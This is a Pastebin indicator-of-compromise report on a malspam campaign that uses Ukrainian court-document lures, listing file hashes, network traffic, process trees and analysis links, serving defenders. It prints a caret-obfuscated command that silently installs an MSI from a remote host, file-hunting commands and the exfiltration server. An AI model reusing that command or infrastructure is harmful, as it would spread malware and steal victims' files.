Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #Autoit #MSI #CDFv2
- https://pastebin.com/qHHUgBNK
- previous_contact:
- 12/04/21 https://pastebin.com/yBpP4PPw
- FAQ:
- https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_083
- attack_vector
- --------------
- email > attach .doc & .xlam > decode by passwd > VBA Macro > GET MSI > %appdata%\Josh Close\CsvHelper\csvhelper.exe > exfil to 45.146.165.91:8080
- email_headers
- --------------
- n/a
- files
- --------------
- SHA-256 4acfcccf535da0686c8343c7eeb0c450e6021fca20a9b1a02211aaf0e6c9dc13
- File name Повістка_до суду - Михайло Васильович №3.doc [ CDF V2 Document ] - bad passwd or corrupted. cant extract
- File size 263.50 KB (269824 bytes)
- SHA-256 882597c251905f9be31352ba034835764124c9a9e25ef1ba0150e5998c621f07
- File name копії судових документів - Мих.xlam [ CDF V2 Document ]
- File size 22.00 KB (22528 bytes)
- SHA-256 8c8ef518239308216d06b4bf9b2771dbb70759cb1c9e6327a1cd045444f2b69a
- File name копії судових документів - Мих.xlam [ Office Open XML Spreadsheet ]
- File size 15.79 KB (16164 bytes)
- SHA-256 e9a858127f5f6e5e0e94ed655a2bf9ed228f87bc99d9b12113e27dcc84be3909
- File name 240721-1.msi [ Windows Installer ]
- File size 6.46 MB (6770688 bytes)
- SHA-256 700b05fede8afe3573b6fec81452d4b09c29adb003cdacb762c8b53d84709901
- File name se1.exe [ PE32 executable for MS Windows] BobSoft Mini Delphi -> BoB / BobSoft
- File size 16.47 MB (17274187 bytes)
- SHA-256 17c3cf5742d2a0995afb4dd2a2d711abe5de346abde49cf4cf5b82c14e0a155f
- File name csvhelper.exe [ PE32 executable for MS Windows ]
- File size 6.93 MB (7266816 bytes)
- activity
- **************
- PL_SCR http://2215.site/240721-1.msi
- C2 45.146.165.91:8080/upld/
- netwrk
- --------------
- 45.146.165.91 2215.site GET /240721-1.msi HTTP/1.1 Windows Installer
- 45.146.165.91 45.146.165.91:8080 POST /upld/AC38D1C7 HTTP/1.1 (application/upload) Mozilla/4.0
- comp
- --------------
- msiexec.exe 2504 TCP 45.146.165.91 80 ESTABLISHED
- csvhelper.exe 3132 TCP 45.146.165.91 8080 ESTABLISHED
- csvhelper.exe 3132 TCP 45.146.165.91 8080 ESTABLISHED
- proc
- --------------
- C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE
- C:\Windows\SysWOW64\cmd.exe /c P^i^ng 127.0.0.1 -n 66 > nuL && m^S^Ie^X^e^C /i http://2215.site/240721-1.msi /qn
- C:\Windows\SysWOW64\PING.EXE 127.0.0.1 -n 66
- C:\Windows\SysWOW64\msiexec.exe /i http://2215.site/240721-1.msi /qn
- C:\Windows\system32\msiexec.exe /V
- C:\Windows\syswow64\MsiExec.exe -Embedding 5603E1E9BABB29850E6EDC59A79FB67D
- "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
- C:\tmp\MW-e311c016-8944-4faf-b4a3-b4689444f124\files\se1.exe
- C:\Users\operator\AppData\Roaming\Josh Close\CsvHelper\csvhelper.exe
- C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.doc" /S /B /A
- C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.pdf" /S /B /A
- ...
- C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.7z" /S /B /A
- C:\Windows\SysWOW64\cmd.exe cmd /c start /min r.bat
- C:\Windows\system32\cmd.exe /K r.bat
- C:\Windows\SysWOW64\cmd.exe /min /c del "C:\Users\operator\AppData\Roaming\Josh Close\CsvHelper\r.bat"
- C:\Windows\SysWOW64\taskkill.exe /IM cmd.exe /F
- persist
- --------------
- n/a
- drop
- --------------
- %tmp%\MW-e311c016-8944-4faf-b4a3-b4689444f124\files\se1.exe
- %appdata%\Josh Close\CsvHelper\csvhelper.exe
- # # #
- VT details
- https://www.virustotal.com/gui/file/8c8ef518239308216d06b4bf9b2771dbb70759cb1c9e6327a1cd045444f2b69a/details
- https://www.virustotal.com/gui/url/5cb4eaeb4d3c3a0d086bcc60b1f4a2d0247cbb78a14f5818e1ae3681b3c75aab/details
- https://urlscan.io/result/ddba54d9-71b0-447e-8882-3c4f1cecb4f2/
- https://www.virustotal.com/gui/file/e9a858127f5f6e5e0e94ed655a2bf9ed228f87bc99d9b12113e27dcc84be3909/details
- https://www.virustotal.com/gui/file/700b05fede8afe3573b6fec81452d4b09c29adb003cdacb762c8b53d84709901/details
- https://www.virustotal.com/gui/file/17c3cf5742d2a0995afb4dd2a2d711abe5de346abde49cf4cf5b82c14e0a155f/details
- https://analyze.intezer.com/analyses/8fc75e5a-ef6e-48a1-8510-e8945272b9dc
- https://analyze.intezer.com/analyses/fc99be4a-a1aa-4c62-a31c-630fd2a5bfbc
- VR
Add Comment
Please, Sign In to add comment